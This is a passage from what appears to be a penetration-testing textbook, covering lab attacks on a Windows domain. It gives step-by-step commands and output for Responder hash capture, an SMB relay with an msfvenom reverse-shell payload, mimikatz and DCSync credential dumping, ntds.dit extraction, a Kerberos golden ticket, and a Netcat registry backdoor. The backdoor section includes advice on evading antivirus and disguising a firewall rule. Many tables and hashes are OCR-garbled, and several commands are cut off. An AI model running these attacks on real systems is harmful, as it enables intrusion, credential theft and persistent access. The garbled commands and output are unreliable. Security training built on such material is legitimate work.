| SQL server | [ON] |
| FTP server | [ON] |
| IMAP server | [ON] |
| POP3 server | [ON] |
| SMTP server | [ON] |
| DNS server | [ON] |

In this example, let's say we venom the victim at 192.168.1.125 while trying to access the fileserver at \metasploitable3\\. However, for the victim there will be an error message, as shown in the following screenshot:



Now the attackers use Responder to pause the results, including the NTLM username and the hash, as shown in the following screenshot:

| [mMSV2] W71MV2-SSP Client : 192.168.1.115 |
|--|
| SMEV2] W7LMv2-55F Username : METRSFLOITABLE3/vagrant |
| ISMNV21 N7LMV2-SSP Hash : vagrant::MBTASPLOITABLE3:0cdfle95581be7ae:82EDD52C731D47C28E00850D52A5 |
| 06531500E090201D67B0BCBFEF79CC90006000002800630040004200330001001E00570049004E002D005000520048 |
| 0460056000400140053009b00420033002g006c006r00630061006c0003003400570049004g002p005000520048003400390 |
| 6002E0053004D00420033002E006C006E0063006E006500140033004D00420033002E006C006F00630061086C0007000 |
| 00400020000000000000000000000000000000 |
| 00800000000000000000000000000000000000 |
| 000000000000000000000000000000000000000 |
| [*] Skipping previously captured hash for METASPLOITABLE3\vagrant |
| [*] Skipping previously captured hash for METASPLOITABLE3/vagrant |
| [*] Skipping previously captured hash for METASPLOITABLE3/vagrant |
| [*] Skipping previously captured hash for METASPLOITABLE3/Vagrant |
| [*] Skipping previously captured hash for MEYASPLOITABLE3/vagrant |
| [*] Skipping previously captured hash for METASPLOITABLE3/vagrant |

Another easy password grabbing attack can be performed using Responder by running responder -I eth0 -wrFb in the Terminal. In this scenario, the user will get an NTLM popup to enter their username and password. All the log files will be available in /usr/share/responder/logs/, and the log filename will be sMBv2-NTLMv2-SSP-<IP>.txt. This can then be passed directly to John the Ripper by running john SMBv2-NTLMv2-SSP-<IP>.txt for the offline cracking on the NTLM hash that was captured. As shown in the following screenshot, the output of john can be verified with the --show option. The first variable represents the username, the second represents the plaintext password, and third represents the hostname; this is all followed by the hashes:

SMB relay attacks

SMB-specific attacks are a new and fascinating kind of attack; EternalBlue and SMB relay attacks are just two examples. Penetration testers utilize the SMB relay to grab authentication attempts and use them on the network for further enhancement. These are nothing but pass-the-hash attacks. In order to launch the SMB relay attack, go through the following steps:

- 1. Create a backdoor with the specific payload:
- msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.125 lport=443 -f
- 2. Now equip the SMB relay attack by using smbrelayx.py. This file can be found at /usr/share/doc/python-impacket/examples/smbrelayx.py, which is part of the Python impacket package. Testers can run and set up a SMB server as shown in the following screenshot, and run the host script, which should allow us to get another reverse shell without any problem:



3. Ensure the Metasploit handler is up and running with the same payload that was set when creating the payment.exe file. Finally, you should be able to see a reverse shell on your Meterpreter, as shown in the following screenshot:



Escalating access rights in Active Directory

We have just explored how to escalate privileges within a system and how to grab credentials over the network. Now let's utilize all the details that we have collected so far; then we should be able to achieve the goal of penetration testing using the kill-chain methodology. In this section, we will escalate the privilege of a normal domain user to that of the domain administrator.

We identify the system that is connected to the domain and utilize our Empire PowerShell tool to escalate to the domain controller and dump all the username and password hashes:



You can harvest more information about the domain using the situational_awareness module, get_domain_controller:

usemodule situational_awareness/network/powerview/get_domain_controller

| (Empire: IXMANAVY) > Gsenod (Empire: povershell/situati [*] Tasked XXMALHPY to ron [*] Agent IXMALHPY tasked a [*] Tasked agent EXMALMPY t (Empire: povershell/situati Job started: SRCPRY [*] Valid repults returned [*] Agent XXMALMPY returned | <pre>ule situational_avareness/network/powerview/get_domain_controller enal_awareness/network/powerview/get_domain_controller) > execute TASK_CMM_DXM ith Eask TD 2 b run module powershell/bituational_avareness/network/powerview/get onal_awareness/network/powerview/get_domain_controller} > [*] Agent by 192.168.0.115 cesults.</pre> |
|---|---|
| Forest CurrentTime HighestCommittedDen CSVersion Roles Domain IFAddress SiteName SyncFromAllServersCallback InboundConnections OutboundConnections Name Partitions | <pre>Mastering.kali.thirdedition 1/1/2019 2:56:03 AM 73786 Windows Server 2008 R2 Standard (SchemaRole, NamingRole, PdcRole, BidRole) Mastering.kali.thirdedition 192.168.0.101 Default-First-Site-Name () () () WIN-30FOAJTIDBS.Mastering.kali.thirdedition (DC=Mastering,DC=kali,DC=thirdedition, CN=Schema,CN=Configuration,DC=Mastering,DC=kali,DC=thirdedition)</pre> |

To identify who is logged into the domain, attackers can utilize the get_loggedon module, described as follows:

usemodule situational_awareness/network/powerview/get_loggedOn execute

All users who logged into the domain controllers will be visible, as shown in the following screenshot:

| (Empire: powershi [*] Tasked GZIHNW [*] Agent GZIHNW [*] Tasked agent (Empire: powershi Job started: T2ZG [*] Valid results [*] Agent GZIHNW | ell/situational NEL to run TASE of IL tasked with to cziHNWEL to run ell/situational tov s returned by 19 EL returned pesu | awareness/ne CMD_JOB ask ID 6 module power awareness/ne 2.168.0.115 lts. | twork/powerview/ rnhell/situation twork/powerview/ | <pre>get_loggedon) > run al_awareness/network/p get_loggedon) > [*] Ag</pre> |
|---|---|--|--|--|
| UserName | LogonDomain | AuthDomains | LogonServer | ComputerName |
| admin Normaluser Sshd_server METASPLOITABLE3\$ | MASTERING MASTERING METASPLOITABLE3 MASTERING | | WIN-3UTÜAJ7IDBE WIN-3UTÜAJ7IDBE METASPLOITABLE3 | localhost localhost localhost localhost localhost |

Escalate the privilege locally by using the getsystem module, as shown in the following screenshot:



The next step of the escalation methodology is to escalate the privilege to that of the domain administrator. This will not be required once you have run mimikatz to dump all the user passwords and hashes, as shown in the following screenshot. You can use the hash or plaintext test password to authenticate through the PSEXEC module in Metasploit or CrackMapExec:

```
(Empire: GZ1HNWEL) > mimikatz
[*] Tasked agent GZIHNWEL to run module powershell/credentials/mimikatz/logonpasswords
(Empire: GZIHNWEL) > [*] Agent GZIHNWEL returned results.
Job started: U6VYXT
*] Valid results returned by 192,168.0.115
Hostname: METASPLOITABLE3 / S-1-5-21-2896800945-2844836275-3805921437
  .######. mimikatz 2.1.1 (x64) built on Nov 12 2017 15:32:00
 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ## /*** Benjamin DELPY 'gentilkiwi' ( benjamin@gentilkiwi.com )
 ## \ / ## > http://blog.gentilkiwi.com/mimikatz
 '## V ##'
                Vincent LE TOUX
                                            ( vincent.letoux@gmail.com )
                > http://pingcastle.com / http://mysmartlogon.com
                                                                    ***/
  1#####!
mimikatz(powershell) # sekurlsa::logonpasswords
Authentication Id : 0 ; 604980 (00000000:00093b34)
Session
          : RemoteInteractive from 3
User Name : admin
                : MASTERING
Domain
Logon Server : WIN-JUT0AJ7IDBE
Logon Time
               : 1/1/2019 5:32:19 AM
SID
                 : S-1-5-21-2896800945-2844836275-3805921437-1104
       ESV :
        [00000003] Primary
         * Username : admin
         * Domain : MASTERING
        * LM : 5d567324ba3ccef839cac810fd3b3042
* NTLM : e0fd4e24ce3cc219ccc4bc96e23919a5
        * SHA1 : 47eddcf3f08dee546631dcdada7320cee58cab14
```

Now attackers can check all credentials in the Empire tool's credentials storage by typing creds in the Empire interface, as shown in the following screenshot:

| (migilre: | | creda | | | |
|-----------|------------|----------------------------|------------------|-----------------|-----------------------------------|
| | | | | | |
| CredID | CredType | Domain. | DeecNamo | Hoat | Password |
| | hanh | MASTERING | eduin | METASPLOITABLE | =0fd4el24cm3cc219ccc4bc94e21919a5 |
| | hash | MASTERING | Normaluses | METASPLOITABLES | e0fd4e24ce3cc219ccc4bc96e23919a5 |
| | hash | METASPLOTTABLE3 | sahd server | METASPLOITABLES | 6d0a16cfc061c3359db455d00ec27035 |
| | hash | MASTERING | METASPOOTTABLE35 | METASPLOITABLES | bod1s05d77d09a0e610a201d3c7b59E9 |
| | plaintext | MASTERING | admin | METASITOTTASLES | Letmeint81 |
| | plaintext | MASTERING | Normaluser | METASPLOITABLES | Lotmoin101 |
| | plaintext. | METASPLOITABLES | sshd server | METASPLOITABLES | Derj3311ng |
| | plaintext; | MASTERING. MALF. THIRDEDIT | 710Hadmin | METAS PLOTTABLE | 1 Lotmoin191 |
| | plaintent | MASTERING, KALL, THIRDEDI | 710Mnormaluser | METRIPLOTTABLE | 3 Lotmain:01 |

The second step is to invoke the wmi module from the Empire PowerShell tool. The following is the configuration to be set on the Empire PowerShell command line:

```
usemodule lateral_movement/invoke_wmi
set Listener <listenername>
set ComputerName Mastering.kali.thirdedition(Domain Controller name)
execute
```

This will invoke the domain controller so it becomes an agent to the listener, as shown in the following screenshot:

| (Empire: | owersh | ell/later | al movement/invoke wu | i) > execute | |
|---------------------|---------|---------------------------------------|-----------------------|--|---------------|
| [*] Tasker | 1 52AXG | CLE to ru | n TASK CMD WAIT | | |
| [*] Agent | 5ZAX6C | LE casted | with task ID 1 | | |
| [*] Tasket | d agent | 5ZAXGCLE | to run module powers | hell/lateral novement | /invoke wmi |
| (Empire: | owersh | ell/later | al movement/invoke wm | ii) > [*] Agent 5ZAXGO | LE returned r |
| esults. | | | | | |
| Invoke-Wm | i execu | ted on "m | astering.kali.thirded | lition" | |
| [*] Valid | result | s returne | d by 192,168,1.115 | | |
| (*) Sendin | ig POWE | ASHELL st | ager (stage 1) to 192 | 2.168.1.101 | |
| [*] New an | gent NB | 6MYHUl ch | ecked in | | |
| [+] Initia | al agen | t NF6MYHU | 1 from 192.168.1.101 | now active (Slack) | |
| 11 Senaii | ng agen | t (stage | 2) to NEGMYHU1 at 192 | 2,168,1,101 | |
| agents | | | | | |
| | | | | | |
| ACC1V | e agent | | | | |
| | | 01.11.000 - 1.12 - 1.22 - 1.22 - 1.22 | | | |
| Name | La Int | ernal IP | Machine Name | Username | Process |
| | PID | Delay | Last Seen | | |
| | | | | | |
| E 10 10 10 10 10 10 | | | | CALL OF STREET, STREET | |
| 5ZAXGCLE | ps 192 | .168.1.11 | 5 METASPLOITABLE3 | *MASTERING\admin | powershel |
| 1 | 5900 | 5/0.0 | 2019-01-03 14:56:09 | | |
| NF6MYHU1 | ps 192 | .168.1.10 | 1 WIN-SUTUAJ/IDBE | *MASTERING\admin | powershel |
| | 1888 | 5/0.0 | 2013-01-03 14:56:10 | | |

Once the agent is reported back to the Empire tool, we can change the agent to the newly reported computer by running interact <Name> ; then using the management/enable_rdp module will enable **remote desktop protocol (RDP)** remotely on the domain controller, as shown in the following screenshot:



Now we can remotely access the system by using the RDP. With the current access to the domain controller, we will use this session to further dump all the user details and password hashes.

To dump all users in the Active Directory, we have to locate the entire registry of SECURITY and SYSTEM, and it is crucial to use <code>ntds.dit</code>. This can be performed by a single PowerShell command utilizing <code>Ntdsutil</code>:

ntdsutil "ac I ntds" "ifm""create full c:\temp" q q

What does the preceding command do?

ntdsutil is a command-line utility built into the Windows Server family that enables the management of Active Directory domain services. This utility, **Install from Media (IFM)**, helps us to download all the Active Directory database and registry settings from the domain controller to flat files as shown in the following screenshot. Finally, we can see these files at c:\temp with two folders, Active Directory and registry:



Now both the registry and system hive have been created in the c:\temp folder, which can be utilized for offline password cracking using secretsdump.py.

secretsdump.py is an in-built script within Kali Linux from Impacket. To see plaintext and hashed passwords, attackers can run secretsdump.py -system <systemregistry> -security <securityregistry> -ntds <location of ntds" LOCAL" in the Terminal. You should be able to see the following when running secretsdump.py:



After searching for pekList, all Active Directory usernames and their password hashes must be visible to attackers, as shown in the following screenshot:



Similarly, if the objective was to extract only a domain hashdump, attackers can utilize the credentials/Mimikatz/dcysnc_hashdump, which will run directly on the domain controller to extract only the username and password hashes of all domain users, as shown in the following screenshot:



Compromising Kerberos – the golden-ticket attack

Another set of more sophisticated (and more recent) attacks is the abuse of Microsoft Kerberos vulnerabilities in an Active Directory environment. A successful attack leads to attackers compromising domain controllers and then escalating the privilege to the enterprise admin-and schema admin-level using the Kerberos implementation.

The following are typical steps when a user logs on with a username and password in a Kerberos-based environment:

- 1. User's password is converted into an NTLM hash with a timestamp and then it is sent over to the **Key Distribution Center** (**KDC**).
- 2. Domain controller checks the user information and creates a (**Ticket-Granting Ticket (TGT**).
- 3. This TGT can be accessed only by Kerberos service (KRBTGT).
- 4. The TGT is then passed on to the domain controller from the user to request a **Ticket Granting Service (TGS)** ticket.
- 5. Domain controller validates the **Privileged Account Certificate (PAC)**. If it is allowed to open the ticket, then the TGT is effectively copied to create the TGS
- 6. Finally, the service is granted for the user to access the services.

Attackers can manipulate these Kerberos tickets based on the password hashes that are available. For example, if you have already compromised a system that is connected to a domain and extracted the local user credentials and password hashes, the next step is to identify the KRBTGT password hash to generate a golden ticket; this will make it a little difficult for the forensics and incident response teams to identify the origin of the attack.

In this section, we will explore how easy it is to generate a golden ticket. We can exploit the vulnerability in just a single step by utilizing the Empire tool, if we have a single-domain computer with a low-level admin user account.

All Active Directory controllers are responsible for handling Kerberos ticket requests, which are then used to authenticate the domain users. The krbtgt user account is used to encrypt and sign all the Kerberos tickets generated within a

given domain and then the domain controllers use this account's password to decrypt the Kerberos tickets for a chain of validation. Pentesters must remember that most service accounts, including krbtgt, are not subject to password expiry or password changes and the account name is usually the same.

We will use the low-privileged domain user with local admin access to generate the token, pass the hash to the domain controller, and generate the hash for the specified account. This can be achieved by the following steps:

- 1. List all the credentials harvested in the Empire tool by running the creds command, and pass a hash with pth and the ID credential;
 - creds pth 1

In this case, we use 1, as shown in the following screenshot:

```
(Empire: GZ1HNWEL) > pth 1
(Empire: G21HNWEL) > [*] Agent GZ1HNWEL returned results.
Job started: RD9YLG
Hostname: METASPLOITABLE3 / S-1-5-21-2896800945-2844836275-3805921437
           mimikatz 2.1.1 (x64) built on Nov 12 2017 15:32:00
  . ######.
 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
                > http://blog.gentilkiwi.com/mimikatz
 ## \ / ##
                Vincent LE TOUX
                                            ( vincent.letoux@gmail.com )
 '## v ##'
                > http://pingcastle.com / http://mysmartlogon.com
  '#####!
mimikatz(powershell) # sekurisa::pth /user:admin /domain:MASTERING /ntlm:e0fd4<
       : admin
user
domain : MASTERING
program : cmd.exe
impers. : no
NTLM : e0fd4e24ce3cc219ccc4bc96e23919a5
  PID 5584
  TID 5384
  LSA Process is now R/W
  LUID 0 ; 840597 (00000000:000cd395)
   msv1 0 - data copy @ 0000000000D7EF10 : OK !
```

 Once the hash is passed and new process is created at the privilege level of that user, steal the token and run a further command with the use of the steal_token PID command in the Empire tool, as shown in the following screenshot:

```
(Empire: GZ1HNWEL) > steal token 5584
[*] Tasked GZIHNWEL to run TASK CMD WAIT
[*] Agent G21HNWEL tasked with task ID 14
[*] Tasked agent GZIHNWEL to run module powershell/credentials/
[*] Tasked GZ1HNWEL to run TASK SYSINFO
[*] Agent GZIHNWEL tasked with task ID 15
(Empire: GZ1HNWEL) > sysinfo: 0|http://192.168.0.24:80|MASTERIN
rver 2008 R2 Standard |True|powershell|5860|powershell|5
[*] Agent GZIHNWEL returned results.
error running command: A token belonging to ProcessId 5584 coul
protected process and cannot be opened.
                 http://192.168.0.24:80
Listener:
Internal IP:
               192.168.0.115
Username:
                 MASTERING\SYSTEM
Hostname:
               METASPLOITABLE3
                  Microsoft Windows Server 2008 R2 Standard
OS:
High Integrity:
Process Name:
               powershell
Process ID:
                 5860
                  powershell
Language:
Language Version: 5
```

3. Now we are set to run as SYSTEM user from the host, Metasploitable3, on the domain controller that is running the Mastering domain. The output should include the Domain SID and the necessary password hash:

```
usemodule credentials/Mimikatz/dcysnc
set domain mastering.kali.thirdedition
set username krbtgt
run
```

```
(Empire: powershell/credentials/mimikatz/dosync) > set domain mastering.kali.thirdedition
(Empire: powershell/credentials/mimikatz/dcsync) > set user krbtgt
(Empire: powershell/credentials/mimikatz/desync) > run
 *] Tasked W36XY127 to run TASE CMD JOB
   Agent W36XT127 tasked with task ID 10
   Tasked agent W35XY127 to run module powershell/credentials/mimikatz/dcsync
(Empire: powershell/czedentials/mimikatz/docync) > [*] Agent W36XY127 returned results.
Job started: 68RLZF
  ] Valid results returned by 192.168.0.15
 *] Agent W36X71Z? returned results.
Hostname: METASPLOITABLE3 / S-1-5-21-2896800945-2844836275-3805921437
  .######.
           mimikatz 2.1.1 (x64) built on Nov 12 2017 15:32:00
 .## ^ ##. "A La Vie, A L'Amour" - (ce.eo)
 ## / \ ## /*** Benjamin DELFY 'gentilkiwi' ( benjamin@gentilkiwi.com )
                > http://blog.gentilkiwi.com/mimikatz
 ## \ / ##
                Vincent LE TOUX
 '## v ##'
                                            ( vincent.letoux@gmail.com )
  *#####
                > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz(powershell) # lsadump::dcsync /user:krbtgt /domain:mastering.kali.thirdedition
[DC] 'mastering.kali.thirdedition' will be the domain
[DC] 'WIN-3UTOAJ7IDBE.Mastering.kali.thirdedition' will be the DC server
[DC] 'krbtgt' will be the user account
Object FDN
                    : krbtgt
** SAM ACCOUNT **
                     : krbtgt
SAM Username
```

4. By now we should have stolen the krbtgt user account password hash, if the domain controller is vulnerable. Attackers should try and do the same across all the domain controllers if DCSync failed, and they should be able to see the new credential added to the existing list with the username krbtgt:

| Crediti | стеатуре | romain | tisorMane | Host. | Passent |
|---------|------------|------------------------------|------------------|-----------------|----------------------------------|
| | hash | MASTERINE | actain | METASPLOTTAPLES | e0fdde2dre3cr219cccdbc9te23919a5 |
| | haon. | KETASPLOITABLE 3 | sshd server | METASPLOTTABLES | Ad0a16cfc061c1155db455d00ec27035 |
| | hash | MASTERING | HETASFLOITAHLE35 | METASPLOITABLES | hcd1a05d77d05a0e610a281d5c7b8919 |
| | hash | MASTERING | Bortsalaber | METASPLOTTABLES | e0fd4e24ce3cc215ccc4bc96e23919a5 |
| | plaintest | MASTERING | admin | METASULOTTABLES | Letneln181 |
| | plaintext | METASPLOITABLE3 | sabd server | METASPLOITABLE3 | D8rjJ311ng |
| | plaintext | MASTEDING | Normaluper | METASPLOTTABLE? | Letmin101 |
| | plaintext. | MASTERING. HALL . THIRDEDITY | 108admin | METASPLOITABLE: | Lotnoint#1 |
| | plaintext | MASTERING. BALL, THIRDEDITY | 108hormaluser | METASFLOITABLE | Letnein 181 |
| 10 | hash | mastering.kali.thirdedit | Lonkridtgt | WIN-SUIMAJ7IDBI | fc9784sfaf51a6E8800a8B046691b10f |

5. Finally, when we are able to get the Kerberos hash, this hash can be passed to the domain controller to issue a golden ticket; this can be achieved by running the golden_ticket module with the right credential ID and any username for the module. When the module is successfully executed, you should be able to see a message as shown in the following screenshot and run the golden ticket module with any user you like:

```
usemodule credentials/mimikatz/golden_ticket
set user Cred ID
set user IDONTEXIST
execute
```

A successful execution of the module should provide us with the following details as shown in the following screenshot:

```
(Empire: powershell/credentials/ministr/golden_ticket) > (*) Agent HDBGRTD returned results
 Job started: GEBRIY
    Valid results roturned by 192.148.1.115
Agent W3HORTID returned results.
Hostname: METASFLUITABLE3 / E-1-5-21-2896800545-2844836275-3805921437
  ( vincent.letouxHgmail.com )
    #####*
                   > http://pingcastle.com / http://mysmartlogon.com ***/
836275-3805921437 /krbtgt:fc9384efaf51a6b8d00a8b0466d1b10f /ptt
Ower : IDONTEXIST
Domain : mastering.kali.thirdedition (MASTERING)
SID : 8-1-5-21-2896800945-2044836235-38085921437
User Id : 500
Groups Id : *513 512 320 518 519
ServiceRey: fc9384efaf51a6b8d00a8b0466d1b10f - rc4_hmac_nt
Lifetime : 1/2/2019 3:10:11 AM : 12/30/2028 3:10:11 AM : 12/30/2028 3:10:11 AM
-> Ticket : ** Fans The Ticket **
 * FAC generated
    RncTicketFart generated
   InclicketPart encrypted
 * HrbCred generated
Golden ticket for 'IDONTEXIST @ mastering.kali.thirdedition' successfully submitted for current session
```

6. With the golden ticket, the attacker should be able to view any files on the domain controller as follows, or any system on the domain with this golden ticket, and exfiltrate data:

| | | | | 1\c\$\windows\system32\config |
|----------|--|--|--|--|
| Last | Writari | imo | Length | Hano. |
| /13/2009 | De9a. | EM | | Journal |
| /26/2018 | 11:132 | EM | | ReaBack |
| /13/2009 | 11:29 | 1/M | | systemprofile |
| /13/2009 | 9:49 | EM | | TAR |
| /15/2018 | 2:25 | EM | 262144 | BCD-Template |
| 1/1/2019 | 3:08 | DM. | 46923776 | COMPONENTS |
| t/2/2019 | 11:33 | AM | 1572864 | DEFAUL7 |
| 1/2/2019 | 11:27 | AH | 7160 | netlogon, dnb |
| 1/2/2019 | 11:27 | 204 | 3083 | petlogos.dna |
| /27/2018 | 12:16 | A.M | 262144 | EAM |
| 1/2/2019 | 11:33 | AM. | 262144 | SECURITY |
| 1/2/2019 | 11:37 | AM | 33554432 | SOFTWARE |
| 1/2/2019 | 11:37 | AM. | 8650752 | SYSTEM |
| | /13/2009 /26/2018 /13/2009 /13/2019 1/1/2019 1/2/2019 1/2/2019 1/2/2019 1/2/2019 1/2/2019 1/2/2019 1/2/2019 1/2/2019 | /13/2009 7:34 /26/2018 11:32 /13/2009 11:29 /13/2009 9:49 /15/2018 2:25 1/1/2019 3:08 1/2/2019 11:33 1/2/2019 11:33 1/2/2019 11:33 1/2/2019 11:37 1/2/2019 11:37 | /13/2009 7:34 PM /26/2018 11:32 PM /13/2009 11:29 VM /13/2009 9:49 PM /13/2018 2:25 PM /15/2018 2:25 PM //1/2019 3:06 DM 1/2/2019 11:33 AM 1/2/2019 11:27 AM 1/2/2019 11:27 AM 1/2/2019 11:27 AM 1/2/2019 11:33 AM 1/2/2019 11:33 AM | Listenriterine Length /13/2009 7:34 EM /26/2018 11:32 EM /13/2009 11:25 EM /13/2009 11:25 EM /13/2009 9:49 EM /13/2018 2:25 EM /12/2019 3:08 EM /2/2019 11:33 AM /2/2019 11:27 AM 262144 /2/2019 11:27 AM 262144 /2/2019 11:33 AM 262144 /2/2019 11:37 AM 3554432 /2/2019 11:37 AM |

This can also be achieved by running the following from mimikatz on the compromised system, if the attacker has a remote desktop session on the target domain controller, with the following command:

|kerberos::golden /admin:Administrator /domain:METASPLOITABLE3 /id:ACCOUNTID /sid:DOMAINS
By running these, attackers get authenticated as any user, including
the enterprise-administrator and schema-administrator levels.
One more similar attack is the Kerberos silver-ticket attack, which is not much
talked about. This attack again forges the TGS but it is signed by a service
account; this means the silver-ticket attack is limited to whatever service is
directed on the server. The PowerShell Empire tool can be utilized to exploit the
same vulnerability using the redentials/mimikatz/silver_ticket module by providing
the rc4/NTLM hash to the parameters.

Summary

In this chapter, we looked at the methodology of escalating privileges and explored different methods and tools that can be utilized to achieve our goal penetration test goal.

We first started with common system-level privilege escalation by exploiting ms18_8120_win32k_privesc using bypassuac and also by utilizing existing Windows-scheduled tasks.

We focused on utilizing Meterpreter to gain system-level control and later we took a detailed look at utilizing the Empire tool; then we harvested the credentials by using password sniffers on the network. We also utilized Responder and SMB relay attacks to gain remote system access, and we used Responder to capture the passwords of different systems on a network that utilizes SMB.

We completely compromised an Active Directory using a structured approach. Finally, we exploited access rights in an Active Directory by using an Empire PowerShell and a compromised Kerberos account and performed a golden-ticket attack utilizing the Empire tool.

In the next chapter (Chapter 13, Command and Control), we will learn how attackers use different techniques to maintain access to the compromised system in line with the kill-chain methodology. We will also delve into how to exfiltrate data from internal systems to external systems.
Command and Control

Modern attackers are not interested in exploiting a system or network and then moving on; instead, the goal is to attack and compromise a network of value, and then remain resident on the network for as long as possible. **Command and control (C2)** refers to the mechanisms that testers use to replicate attacker actions by persisting on a system, maintaining two-way communications, enabling data to be exfiltrated to the tester's location, and hiding the evidence of the attack.

The final stage of the attacker's kill chain is the command, control, and communicate phase, where the attacker relies on a persistent connection with the compromised system to ensure that they can continue to maintain their control.

In this chapter, you will learn about the following topics:

- Importance of persistence
- Maintaining persistence with the Metasploit framework, PowerShell Empire, and online file sharing
- Performing domain fronting techniques to maintain command and control
- The art of exfiltrating data using different protocols
- Hiding the evidence of an attack

Persistence

To be effective, the attacker must be able to maintain **interactive persistence**; they must have a two-way communication channel with the exploited system (interactive) that remains on the compromised system for a long period of time without being discovered (persistence). This type of connectivity is a requirement for the following reasons:

- Network intrusions may be detected, and the compromised systems may be identified and patched
- Some exploits only work once because the vulnerability is intermittent, or because exploitation causes the system to fail or to change, rendering the vulnerability unusable
- Attackers may need to return multiple times to the same target for various reasons
- The target's usefulness is not always immediately known at the time it is compromised

The tool used to maintain interactive persistence is usually referred to by classic terms such as **backdoor** or **rootkit**. However, the trend toward long-term persistence by both automated malware and human attacks has blurred the meaning of traditional labels, so instead we will refer to malicious software that is intended to stay on the compromised system for a long period of time as a **persistent agent**.

These persistent agents perform many functions for attackers and penetration testers, including the following:

- Allowing additional tools to be uploaded to support new attacks, especially against systems located on the same network.
- Facilitating the exfiltration of data from compromised systems and networks.
- Allowing attackers to reconnect to a compromised system, usually via an encrypted channel to avoid detection. Persistent agents have been known to remain on systems for more than a year.
- Employing antiforensic techniques to avoid being detected, including

hiding in the target's filesystem or system memory, using strong authentication, and using encryption.

Using persistent agents

Traditionally, attackers would place a backdoor on a compromised system. If the front door provides authorized access to legitimate users, backdoor applications allow attackers to return to an exploited system and have access to services and data.

Unfortunately, classic backdoors provided limited interactivity, and were not designed to be persistent on compromised systems for very long time frames. This was viewed as a significant shortcoming by the attacker community, because once the backdoor was discovered and removed, there was additional work required to repeat the compromise steps and exploit the system, which was made even more difficult by forewarned system administrators defending the network and its resources.

Attackers now focus on persistent agents that are properly employed and are more difficult to detect. The first tool we will review is the venerable Netcat.

Employing Netcat as a persistent agent

Netcat is an application that supports reading from and writing to network connections using raw TCP and UDP packets. Unlike packets that are organized by services such as Telnet or FTP, Netcat's packets are not accompanied by headers or other channel information specific to the service. This simplifies communications and allows for an almost universal communication channel.

The last stable version of Netcat was released by Hobbit in 1996, and it has remained as useful as ever; in fact, it is frequently referred to as the **TCP/IP Swiss Army knife**. Netcat can perform many functions, including the following:

- Port scanning
- Banner grabbing to identify services
- Port redirection and proxying
- File transfer and chatting, including support for data forensics and remote backups
- Use as a backdoor or an interactive persistent agent on a compromised system

At this point, we will focus on using Netcat to create a persistent shell on a compromised system. Although the following example uses Windows as the target platform, it functions the same when used on a Unix-based platform. It should also be noted that most legacy Unix platforms include Netcat as part of the operating system.

In the example shown in the following screenshot, we will retain the executable's name, nc.exe; however, it is common to rename it prior to use in order to minimize detection. Even if it is renamed, it will usually be identified by antivirus software; many attackers will alter or remove elements of Netcat's source code that are not required and recompile it prior to use. Such changes can alter the specific signature that antivirus programs use to identify the application as Netcat, making it invisible to antivirus programs:

- 1. Netcat is stored on Kali in the /usr/share/windows-binaries repository. To upload it to a compromised system, enter the following command from within Meterpreter:
- meterpreter> upload /usr/share/windows-binaries/nc.exe C:\\WINDOWS\\system32

The execution of the previous command is shown in the following screenshot:

meterpreter > upload /usr/share/windows-binaries/nc.exe c:\windows\system32
[*] uploading : /usr/share/windows-binaries/nc.exe -> c:windowssystem32
[*] uploaded : /usr/share/windows-binaries/nc.exe -> c:windowssystem32

You do not have to place it in the system32 folder specifically; however, due to the number and diversity of file types in this folder, this is the best location to hide a file in a compromised system.



While conducting a penetration test on one client, we identified six separate instances of Netcat on one server. Netcat had been installed twice by two separate system administrators to support network management; the other four instances were installed by external attackers, and were not identified until the penetration test. Therefore, always look to see whether or not Netcat is already installed on your target!

If you do not have a Meterpreter connection, you can use **Trivial File Transfer Protocol (TFTP)** to transfer the file.

- 2. Next, configure the registry to launch Netcat when the system starts up, and ensure that it is listening on port 8888 (or any other port that you have selected, as long as it is not in use) using the following command:
- meterpreter> reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\r
- 3. Confirm that the change in the registry was successfully implemented using the following queryval command:

|meterpreter> reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v

4. Using the netsh command, open a port on the local firewall to ensure that the compromised system will accept remote connections to Netcat. It is important to know the target's operating system. The netsh advfirewall firewall command-line context is used for Windows Vista, Windows Server 2008, and later versions; the netsh firewall command is used for earlier operating systems.

5. To add a port to the local Windows firewall, enter the shell command at the Meterpreter prompt and then enter rule using the appropriate command. When naming the rule, use a name such as svchostpassthrough that suggests that rule is important for the proper functioning of the system.

A sample command is shown as follows:

- C:\Windows\system32>netsh advfirewall firewall add rule name="svchostpassthrough
- 6. Confirm that the change was successfully implemented using the following command:
- C:\windows\system32>netsh advfirewall firewall show rule name="svchostpassthroug

The execution of the previously mentioned commands is shown in the following screenshot:

| meterpreter > shell | |
|--|---|
| Process 464 created. | |
| Channel 12 created. | |
| Microsoft Windows [Versio | n 6.1.7601] |
| Copyright (c) 2009 Micros | oft Corporation. All rights reserved. |
| C:\Windows\System32>netsh " dir=out action=allow pr | advfirewall firewall add rule name="svchostpassthrough otocol=TCP localport=8888 |
| netsh advfirewall firewal ow protocol=TCP localport | <pre>1 add rule name="svchostpassthrough" dir=out action=all =8888</pre> |
| ok. | |
| C:\Windows\System32>netsh h" netsh advfirewall firewal | advfirewall firewall show rule name="svchostpassthroug l show rule name="svchostpassthrough" |
| Rule Name: | svchostpassthrough |
| Enabled: | Yes |
| Direction: | Out |
| Profiles: | Domain, Private, Public |
| Grouping: | |
| LocalIP: | Any |
| RemoteIP: | Any |
| Protocol: | TCP |
| LocalPort: | 8888 |

- 7. When the port rule is confirmed, ensure that the reboot option works, as follows:
 - Enter the following command from the Meterpreter prompt:

L

meterpreter> reboot

• Enter the following command from an interactive Windows shell:

C:\windows\system32> shutdown /r /t 15

8. To remotely access the compromised system, type nc at the Command Prompt, indicate the verbosity of the connection (-v reports basic information and -vv reports much more information), and then enter the IP address of the target and the port number, as shown in the following screenshot:

```
root@kali:~# nc -vv 192.168.0.119 8888
192.168.0.119: inverse host lookup failed: Unknown host
(UNKNOWN) [192.168.0.119] 8888 (?) open
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
```

C:\Windows\SysWOW64>

Unfortunately, there are some limitations to using Netcat. There is no authentication or encryption of transmitted data, and it is detected by nearly all antivirus software.

